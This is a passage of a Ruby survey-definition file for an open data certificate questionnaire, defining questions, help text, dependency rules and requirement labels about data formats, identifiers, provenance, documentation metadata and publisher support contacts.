label_standard_30 'You should <strong>provide your data in an open standard format</strong> so that people can use widely available tools to process it more easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_30'
dependency :rule => 'A'
condition_A :q_openStandard, '==', :a_false
q_dataType 'What kind of data do you publish?',
:discussion_topic => :dataType,
:pick => :any
a_documents 'human-readable documents',
:help_text => 'Choose this if your data is meant for human consumption. For example; policy documents, white papers, reports and meeting minutes. These usually have some structure to them but are mostly text.'
a_statistical 'statistical data like counts, averages and percentages',
:help_text => 'Choose this if your data is statistical or numeric data like counts, averages or percentages. Like census results, traffic flow information or crime statistics for example.'
a_geographic 'geographic information, such as points and boundaries',
:help_text => 'Choose this if your data can be plotted on a map as points, boundaries or lines.'
a_structured 'other kinds of structured data',
:help_text => 'Choose this if your data is structured in other ways. Like event details, railway timetables, contact information or anything that can be interpreted as data, and analysed and presented in multiple ways.'
q_documentFormat 'Do your human-readable documents include formats that',
:discussion_topic => :documentFormat,
:display_on_certificate => true,
:text_as_statement => 'Documents are published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_documents
a_semantic 'describe semantic structure like HTML, Docbook or Markdown',
:text_as_statement => 'in a semantic format',
:help_text => 'These formats label structures like chapters, headings and tables that make it easy to automatically create summaries like tables of contents and glossaries. They also make it easy to apply different styles to the document so its appearance changes.',
:requirement => ['standard_31']
a_format 'describe information on formatting like OOXML or PDF',
:text_as_statement => 'in a display format',
:help_text => 'These formats emphasise appearance like fonts, colours and positioning of different elements within the page. These are good for human consumption, but aren\'t as easy for people to process automatically and change style.',
:requirement => ['pilot_15']
a_unsuitable 'aren\'t meant for documents like Excel, JSON or CSV',
:text_as_statement => 'in a format unsuitable for documents',
:help_text => 'These formats better suit tabular or structured data.'
label_standard_31 'You should <strong>publish documents in a format that exposes semantic structure</strong> so that people can display them in different styles.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_31'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_documents
condition_B :q_documentFormat, '!=', :a_semantic
label_pilot_15 'You should <strong>publish documents in a format designed specifically for them</strong> so that they\'re easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_15'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_documents
condition_B :q_documentFormat, '!=', :a_semantic
condition_C :q_documentFormat, '!=', :a_format
q_statisticalFormat 'Does your statistical data include formats that',
:discussion_topic => :statisticalFormat,
:display_on_certificate => true,
:text_as_statement => 'Statistical data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_statistical
a_statistical 'expose the structure of statistical hypercube data like <a href="http://sdmx.org/">SDMX</a> or <a href="http://www.w3.org/TR/vocab-data-cube/">Data Cube</a>',
:text_as_statement => 'in a statistical data format',
:help_text => 'Individual observations in hypercubes relate to a particular measure and a set of dimensions. Each observation may also be related to annotations that give extra context. Formats like <a href="http://sdmx.org/">SDMX</a> and <a href="http://www.w3.org/TR/vocab-data-cube/">Data Cube</a> are designed to express this underlying structure.',
:requirement => ['exemplar_13']
a_tabular 'treat statistical data as a table like CSV',
:text_as_statement => 'in a tabular data format',
:help_text => 'These formats arrange statistical data within a table of rows and columns. This lacks extra context about the underlying hypercube but is easy to process.',
:requirement => ['standard_32']
a_format 'focus on the format of tabular data like Excel',
:text_as_statement => 'in a presentation format',
:help_text => 'Spreadsheets use formatting like italic or bold text, and indentation within fields to describe its appearance and underlying structure. This styling helps people to understand the meaning of your data but makes it less suitable for computers to process.',
:requirement => ['pilot_16']
a_unsuitable 'aren\'t meant for statistical or tabular data like Word or PDF',
:text_as_statement => 'in a format unsuitable for statistical data',
:help_text => 'These formats don\'t suit statistical data because they obscure the underlying structure of the data.'
label_exemplar_13 'You should <strong>publish statistical data in a format that exposes dimensions and measures</strong> so that it\'s easy to analyse.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_13'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
label_standard_32 'You should <strong>publish tabular data in a format that exposes tables of data</strong> so that it\'s easy to analyse.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_32'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
condition_C :q_statisticalFormat, '!=', :a_tabular
label_pilot_16 'You should <strong>publish tabular data in a format designed for that purpose</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_16'
dependency :rule => 'A and (B and C and D)'
condition_A :q_dataType, '==', :a_statistical
condition_B :q_statisticalFormat, '!=', :a_statistical
condition_C :q_statisticalFormat, '!=', :a_tabular
condition_D :q_statisticalFormat, '!=', :a_format
q_geographicFormat 'Does your geographic data include formats that',
:discussion_topic => :geographicFormat,
:display_on_certificate => true,
:text_as_statement => 'Geographic data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_geographic
a_specific 'are designed for geographic data like <a href="http://www.opengeospatial.org/standards/kml/">KML</a> or <a href="http://www.geojson.org/">GeoJSON</a>',
:text_as_statement => 'in a geographic data format',
:help_text => 'These formats describe points, lines and boundaries, and expose structures in the data which make it easier to process automatically.',
:requirement => ['exemplar_14']
a_generic 'keep data structured like JSON, XML or CSV',
:text_as_statement => 'in a generic data format',
:help_text => 'Any format that stores normal structured data can express geographic data too, particularly if it only holds data about points.',
:requirement => ['pilot_17']
a_unsuitable 'aren\'t designed for geographic data like Word or PDF',
:text_as_statement => 'in a format unsuitable for geographic data',
:help_text => 'These formats don\'t suit geographic data because they obscure the underlying structure of the data.'
label_exemplar_14 'You should <strong>publish geographic data in a format designed for that purpose</strong> so that people can use widely available tools to process it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_14'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_geographic
condition_B :q_geographicFormat, '!=', :a_specific
label_pilot_17 'You should <strong>publish geographic data as structured data</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_17'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_geographic
condition_B :q_geographicFormat, '!=', :a_specific
condition_C :q_geographicFormat, '!=', :a_generic
q_structuredFormat 'Does your structured data include formats that',
:discussion_topic => :structuredFormat,
:display_on_certificate => true,
:text_as_statement => 'Structured data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_structured
a_suitable 'are designed for structured data like JSON, XML, Turtle or CSV',
:text_as_statement => 'in a structured data format',
:help_text => 'These formats organise data into a basic structure of things which have values for a known set of properties. These formats are easy for computers to process automatically.',
:requirement => ['pilot_18']
a_unsuitable 'aren\'t designed for structured data like Word or PDF',
:text_as_statement => 'in a format unsuitable for structured data',
:help_text => 'These formats don\'t suit this kind of data because they obscure its underlying structure.'
label_pilot_18 'You should <strong>publish structured data in a format designed for that purpose</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_18'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_structured
condition_B :q_structuredFormat, '!=', :a_suitable
q_identifiers 'Does your data use persistent identifiers?',
:discussion_topic => :identifiers,
:display_on_certificate => true,
:text_as_statement => 'The data includes',
:help_text => 'Data is usually about real things like schools or roads or uses a coding scheme. If data from different sources use the same persistent and unique identifier to refer to the same things, people can combine sources easily to create more useful data. Identifiers might be GUIDs, DOIs or URLs.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'persistent identifiers',
:requirement => ['standard_33']
label_standard_33 'You should <strong>use identifiers for things in your data</strong> so that they can be easily related with other data about those things.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_33'
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_false
q_resolvingIds 'Can the identifiers in your data be used to find extra information?',
:discussion_topic => :resolvingIds,
:display_on_certificate => true,
:text_as_statement => 'The persistent identifiers',
:pick => :one
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_true
a_false 'no, the identifiers can\'t be used to find extra information',
:text_as_statement => ''
a_service 'yes, there is a service that people can use to resolve the identifiers',
:text_as_statement => 'resolve using a service',
:help_text => 'Online services can be used to give people information about identifiers such as GUIDs or DOIs which can\'t be directly accessed in the way that URLs are.',
:requirement => ['standard_34']
a_resolvable 'yes, the identifiers are URLs that resolve to give information',
:text_as_statement => 'resolve because they are URLs',
:help_text => 'URLs are useful for both people and computers. People can put a URL into their browser and read more information, like <a href="http://opencorporates.com/companies/gb/08030289">companies</a> and <a href="http://data.ordnancesurvey.co.uk/doc/postcodeunit/EC2A4JE">postcodes</a>. Computers can also process this extra information using scripts to access the underlying data.',
:requirement => ['exemplar_15']
label_standard_34 'You should <strong>provide a service to resolve the identifiers you use</strong> so that people can find extra information about them.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_34'
dependency :rule => 'A and (B and C)'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '!=', :a_service
condition_C :q_resolvingIds, '!=', :a_resolvable
label_exemplar_15 'You should <strong>link to a web page of information about each of the things in your data</strong> so that people can easily find and share that information.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_15'
dependency :rule => 'A and (B)'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '!=', :a_resolvable
q_resolutionServiceURL 'Where is the service that is used to resolve the identifiers?',
:discussion_topic => :resolutionServiceURL,
:display_on_certificate => true,
:text_as_statement => 'The identifier resolution service is at',
:help_text => 'The resolution service should take an identifier as a query parameter and give back some information about the thing it identifies.'
dependency :rule => 'A and B'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '==', :a_service
a_1 'Identifier Resolution Service URL',
:string,
:input_type => :url,
:placeholder => 'Identifier Resolution Service URL',
:requirement => ['standard_35']
label_standard_35 'You should <strong>have a URL through which identifiers can be resolved</strong> so that more information about them can be found by a computer.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_35'
dependency :rule => 'A and B and C'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '==', :a_service
condition_C :q_resolutionServiceURL, '==', {:string_value => '', :answer_reference => '1'}
q_existingExternalUrls 'Is there third-party information about things in your data on the web?',
:discussion_topic => :existingExternalUrls,
:help_text => 'Sometimes other people outside your control provide URLs to the things your data is about. For example, your data might have postcodes in it that link to the Ordnance Survey website.',
:pick => :one,
:required => :exemplar
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_true
a_false 'no'
a_true 'yes'
q_reliableExternalUrls 'Is that third-party information reliable?',
:discussion_topic => :reliableExternalUrls,
:help_text => 'If a third-party provides public URLs about things in your data, they probably take steps to ensure data quality and reliability. This is a measure of how much you trust their processes to do that. Look for their open data certificate or similar hallmarks to help make your decision.',
:pick => :one,
:required => :exemplar
dependency :rule => 'A and B'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
a_false 'no'
a_true 'yes'
q_externalUrls 'Does your data use those third-party URLs?',
:discussion_topic => :externalUrls,
:display_on_certificate => true,
:text_as_statement => 'Third-party URLs are',
:help_text => 'You should use third-party URLs that resolve to information about the things your data describes. This reduces duplication and helps people combine data from different sources to make it more useful.',
:pick => :one
dependency :rule => 'A and B and C'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
condition_C :q_reliableExternalUrls, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'referenced in this data',
:requirement => ['exemplar_16']
label_exemplar_16 'You should <strong>use URLs to third-party information in your data</strong> so that it\'s easy to combine with other data that uses those URLs.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_16'
dependency :rule => 'A and B and C and D'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
condition_C :q_reliableExternalUrls, '==', :a_true
condition_D :q_externalUrls, '==', :a_false
label_group_13 'Trust',
:help_text => 'how much trust people can put in your data',
:custom_renderer => '/partials/fieldset'
q_provenance 'Do you provide machine-readable provenance for your data?',
:discussion_topic => :provenance,
:display_on_certificate => true,
:text_as_statement => 'The provenance of this data is',
:help_text => 'This is about the origins of your data: how it was created and processed before it was published. It builds trust in the data you publish because people can trace back how it has been handled.',
:help_text_more_url => 'http://www.w3.org/TR/prov-primer/',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable',
:requirement => ['exemplar_17']
label_exemplar_17 'You should <strong>provide a machine-readable provenance trail</strong> about your data so that people can trace how it was processed.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_17'
dependency :rule => 'A'
condition_A :q_provenance, '==', :a_false
q_digitalCertificate 'Where do you describe how people can verify that data they receive comes from you?',
:discussion_topic => :digitalCertificate,
:display_on_certificate => true,
:text_as_statement => 'This data can be verified using',
:help_text => 'If you deliver important data to people they should be able to check that what they receive is the same as what you published. For example, you can digitally sign the data you publish, so people can tell if it has been tampered with.'
a_1 'Verification Process URL',
:string,
:input_type => :url,
:placeholder => 'Verification Process URL',
:requirement => ['exemplar_18']
label_exemplar_18 'You should <strong>describe how people can check that the data they receive is the same as what you published</strong> so that they can trust it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_18'
dependency :rule => 'A'
condition_A :q_digitalCertificate, '==', {:string_value => '', :answer_reference => '1'}
end
section_social 'Social Information',
:description => 'Documentation, support and services' do
label_group_15 'Documentation',
:help_text => 'how you help people understand the context and content of your data',
:custom_renderer => '/partials/fieldset'
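# The answer reference names used below (a_title, a_description, a_issued,
# a_modified, a_accrualPeriodicity, a_identifier, a_landingPage, a_language,
# a_publisher, a_spatial, a_temporal, a_theme, a_keyword, a_distribution)
# appear to follow Dublin Core / DCAT property names; that mapping is an
# assumption based on the naming, not something stated in the questionnaire.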
q_documentationMetadata 'Does your data documentation include machine-readable data for:',
:discussion_topic => :documentationMetadata,
:display_on_certificate => true,
:text_as_statement => 'The documentation includes machine-readable data for',
:pick => :any
dependency :rule => 'A'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_title 'title',
:text_as_statement => 'title',
:requirement => ['standard_36']
a_description 'description',
:text_as_statement => 'description',
:requirement => ['standard_37']
a_issued 'release date',
:text_as_statement => 'release date',
:requirement => ['standard_38']
a_modified 'modification date',
:text_as_statement => 'modification date',
:requirement => ['standard_39']
a_accrualPeriodicity 'frequency of releases',
:text_as_statement => 'release frequency',
:requirement => ['standard_40']
a_identifier 'identifier',
:text_as_statement => 'identifier',
:requirement => ['standard_41']
a_landingPage 'landing page',
:text_as_statement => 'landing page',
:requirement => ['standard_42']
a_language 'language',
:text_as_statement => 'language',
:requirement => ['standard_43']
a_publisher 'publisher',
:text_as_statement => 'publisher',
:requirement => ['standard_44']
a_spatial 'spatial/geographical coverage',
:text_as_statement => 'spatial/geographical coverage',
:requirement => ['standard_45']
a_temporal 'temporal coverage',
:text_as_statement => 'temporal coverage',
:requirement => ['standard_46']
a_theme 'theme(s)',
:text_as_statement => 'theme(s)',
:requirement => ['standard_47']
a_keyword 'keyword(s) or tag(s)',
:text_as_statement => 'keyword(s) or tag(s)',
:requirement => ['standard_48']
a_distribution 'distribution(s)',
:text_as_statement => 'distribution(s)'
label_standard_36 'You should <strong>include a machine-readable data title in your documentation</strong> so that people know how to refer to it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_36'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_title
label_standard_37 'You should <strong>include a machine-readable data description in your documentation</strong> so that people know what it contains.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_37'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_description
label_standard_38 'You should <strong>include a machine-readable data release date in your documentation</strong> so that people know how timely it is.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_38'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_issued
label_standard_39 'You should <strong>include a machine-readable last modification date in your documentation</strong> so that people know they have the latest data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_39'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_modified
label_standard_40 'You should <strong>provide machine-readable metadata about how frequently you release new versions of your data</strong> so people know how often you update it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_40'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_accrualPeriodicity
label_standard_41 'You should <strong>include a canonical URL for the data in your machine-readable documentation</strong> so that people know how to access it consistently.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_41'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_identifier
label_standard_42 'You should <strong>include a canonical URL to the machine-readable documentation itself</strong> so that people know how to access it consistently.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_42'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_landingPage
label_standard_43 'You should <strong>include the data language in your machine-readable documentation</strong> so that people who search for it will know whether they can understand it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_43'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_language
label_standard_44 'You should <strong>indicate the data publisher in your machine-readable documentation</strong> so people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_44'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_publisher
label_standard_45 'You should <strong>include the geographic coverage in your machine-readable documentation</strong> so that people understand what area your data applies to.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_45'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_spatial
label_standard_46 'You should <strong>include the time period in your machine-readable documentation</strong> so that people understand what period your data applies to.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_46'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_temporal
label_standard_47 'You should <strong>include the subject in your machine-readable documentation</strong> so that people know roughly what your data is about.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_47'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_theme
label_standard_48 'You should <strong>include machine-readable keywords or tags in your documentation</strong> to help people search within the data effectively.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_48'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_keyword
q_distributionMetadata 'Does your documentation include machine-readable metadata for each distribution on:',
:discussion_topic => :distributionMetadata,
:display_on_certificate => true,
:text_as_statement => 'The documentation about each distribution includes machine-readable data for',
:pick => :any
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
a_title 'title',
:text_as_statement => 'title',
:requirement => ['standard_49']
a_description 'description',
:text_as_statement => 'description',
:requirement => ['standard_50']
a_issued 'release date',
:text_as_statement => 'release date',
:requirement => ['standard_51']
a_modified 'modification date',
:text_as_statement => 'modification date',
:requirement => ['standard_52']
a_rights 'rights statement',
:text_as_statement => 'rights statement',
:requirement => ['standard_53']
a_accessURL 'URL to access the data',
:text_as_statement => 'a URL to access the data',
:help_text => 'This metadata should be used when your data isn\'t available as a download, like an API for example.'
a_downloadURL 'URL to download the dataset',
:text_as_statement => 'a URL to download the dataset'
a_byteSize 'size in bytes',
:text_as_statement => 'size in bytes'
a_mediaType 'type of download media',
:text_as_statement => 'type of download media'
label_standard_49 'You should <strong>include machine-readable titles within your documentation</strong> so people know how to refer to each data distribution.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_49'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_title
label_standard_50 'You should <strong>include machine-readable descriptions within your documentation</strong> so people know what each data distribution contains.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_50'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_description
label_standard_51 'You should <strong>include machine-readable release dates within your documentation</strong> so people know how current each distribution is.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_51'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_issued
label_standard_52 'You should <strong>include machine-readable last modification dates within your documentation</strong> so people know whether their copy of a data distribution is up-to-date.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_52'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_modified
label_standard_53 'You should <strong>include a machine-readable link to the applicable rights statement</strong> so people can find out what they can do with a data distribution.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_53'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_rights
q_technicalDocumentation 'Where is the technical documentation for the data?',
:discussion_topic => :technicalDocumentation,
:display_on_certificate => true,
:text_as_statement => 'The technical documentation for the data is at'
a_1 'Technical Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Technical Documentation URL',
:requirement => ['pilot_19']
label_pilot_19 'You should <strong>provide technical documentation for the data</strong> so that people understand how to use it.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_19'
dependency :rule => 'A'
condition_A :q_technicalDocumentation, '==', {:string_value => '', :answer_reference => '1'}
q_vocabulary 'Do the data formats use vocabularies or schemas?',
:discussion_topic => :vocabulary,
:help_text => 'Formats like CSV, JSON, XML or Turtle use custom vocabularies or schemas which say what columns or properties the data contains.',
:pick => :one,
:required => :standard
a_false 'no'
a_true 'yes'
q_schemaDocumentationUrl 'Where is documentation about your data vocabularies?',
:discussion_topic => :schemaDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The vocabularies used by this data are documented at'
dependency :rule => 'A'
condition_A :q_vocabulary, '==', :a_true
a_1 'Schema Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Schema Documentation URL',
:requirement => ['standard_54']
label_standard_54 'You should <strong>document any vocabulary you use within your data</strong> so that people know how to interpret it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_54'
dependency :rule => 'A and B'
condition_A :q_vocabulary, '==', :a_true
condition_B :q_schemaDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_codelists 'Are there any codes used in this data?',
:discussion_topic => :codelists,
:help_text => 'If your data uses codes to refer to things like geographical areas, spending categories or diseases for example, these need to be explained to people.',
:pick => :one,
:required => :standard
a_false 'no'
a_true 'yes'
q_codelistDocumentationUrl 'Where are any codes in your data documented?',
:discussion_topic => :codelistDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The codes in this data are documented at'
dependency :rule => 'A'
condition_A :q_codelists, '==', :a_true
a_1 'Codelist Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Codelist Documentation URL',
:requirement => ['standard_55']
label_standard_55 'You should <strong>document the codes used within your data</strong> so that people know how to interpret them.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_55'
dependency :rule => 'A and B'
condition_A :q_codelists, '==', :a_true
condition_B :q_codelistDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
label_group_16 'Support',
:help_text => 'how you communicate with people who use your data',
:custom_renderer => '/partials/fieldset'
q_contactUrl 'Where can people find out how to contact someone with questions about this data?',
:discussion_topic => :contactUrl,
:display_on_certificate => true,
:text_as_statement => 'Find out how to contact someone about this data at',
:help_text => 'Give a URL for a page that describes how people can contact someone if they have questions about the data.'
a_1 'Contact Documentation',
:string,
:input_type => :url,
:placeholder => 'Contact Documentation',
:requirement => ['pilot_20']
label_pilot_20 'You should <strong>provide contact information for people to send questions</strong> about your data to.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_20'
dependency :rule => 'A'
condition_A :q_contactUrl, '==', {:string_value => '', :answer_reference => '1'}
q_improvementsContact 'Where can people find out how to improve the way your data is published?',
:discussion_topic => :improvementsContact,
:display_on_certificate => true,
:text_as_statement => 'Find out how to suggest improvements to publication at'
a_1 'Improvement Suggestions URL',
:string,
:input_type => :url,
:placeholder => 'Improvement Suggestions URL',
:requirement => ['pilot_21']
label_pilot_21 'You should <strong>provide instructions about how to suggest improvements</strong> to the way you publish data so you can discover what people need.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_21'
dependency :rule => 'A'
condition_A :q_improvementsContact, '==', {:string_value => '', :answer_reference => '1'}
q_dataProtectionUrl 'Where can people find out how to contact someone with questions about privacy?',
:discussion_topic => :dataProtectionUrl,
:display_on_certificate => true,
:text_as_statement => 'Find out where to send questions about privacy at'
a_1 'Confidentiality Contact Documentation',
:string,
:input_type => :url,
:placeholder => 'Confidentiality Contact Documentation',
:requirement => ['pilot_22']
label_pilot_22 'You should <strong>provide contact information for people to send questions about privacy</strong> and disclosure of personal details to.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_22'
dependency :rule => 'A'
condition_A :q_dataProtectionUrl, '==', {:string_value => '', :answer_reference => '1'}
q_socialMedia 'Do you use social media to connect with people who use your data?',
:discussion_topic => :socialMedia,
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_56']
label_standard_56 'You should <strong>use social media to reach people who use your data</strong> and discover how it is being used.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_56'
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_false
repeater 'Account' do
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_true
q_account 'Which social media accounts can people reach you on?',
:discussion_topic => :account,
:display_on_certificate => true,
:text_as_statement => 'Contact the curator through these social media accounts',
:help_text => 'Give URLs to your social media accounts, like your Twitter or Facebook profile page.',
:required => :required
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_true
a_1 'Social Media URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Social Media URL'
end
q_forum 'Where should people discuss this dataset?',
:discussion_topic => :forum,
:display_on_certificate => true,
:text_as_statement => 'Discuss this data at',
:help_text => 'Give a URL to your forum or mailing list where people can talk about your data.'
a_1 'Forum or Mailing List URL',
:string,
:input_type => :url,
:placeholder => 'Forum or Mailing List URL',
:requirement => ['standard_57']
label_standard_57 'You should <strong>tell people where they can discuss your data</strong> and support one another.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_57'
dependency :rule => 'A'
condition_A :q_forum, '==', {:string_value => '', :answer_reference => '1'}
q_correctionReporting 'Where can people find out how to request corrections to your data?',
:discussion_topic => :correctionReporting,
:display_on_certificate => true,
:text_as_statement => 'Find out how to request data corrections at',
:help_text => 'Give a URL where people can report errors they spot in your data.'
dependency :rule => 'A'
condition_A :q_corrected, '==', :a_true
a_1 'Correction Instructions URL',
:string,
:input_type => :url,
:placeholder => 'Correction Instructions URL',
:requirement => ['standard_58']
label_standard_58 'You should <strong>provide instructions about how people can report errors</strong> in your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_58'
dependency :rule => 'A and B'
condition_A :q_corrected, '==', :a_true
condition_B :q_correctionReporting, '==', {:string_value => '', :answer_reference => '1'}
q_correctionDiscovery 'Where can people find out how to get notifications of corrections to your data?',
:discussion_topic => :correctionDiscovery,
:display_on_certificate => true,
:text_as_statement => 'Find out how to get notifications about data corrections at',
:help_text => 'Give a URL where you describe how notifications about corrections are shared with people.'
dependency :rule => 'A'
condition_A :q_corrected, '==', :a_true
a_1 'Correction Notification URL',
:string,
:input_type => :url,
:placeholder => 'Correction Notification URL',
:requirement => ['standard_59']
label_standard_59 'You should <strong>provide a mailing list or feed with updates</strong> that people can use to keep their copies of your data up-to-date.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_59'
dependency :rule => 'A and B'
condition_A :q_corrected, '==', :a_true
condition_B :q_correctionDiscovery, '==', {:string_value => '', :answer_reference => '1'}
q_engagementTeam 'Do you have anyone who actively builds a community around this data?',
:discussion_topic => :engagementTeam,
:help_text => 'A community engagement team will engage through social media, blogging, and arrange hackdays or competitions to encourage people to use the data.',
:help_text_more_url => 'http://theodi.org/guide/engaging-reusers',
:pick => :one
a_false 'no'
a_true 'yes',
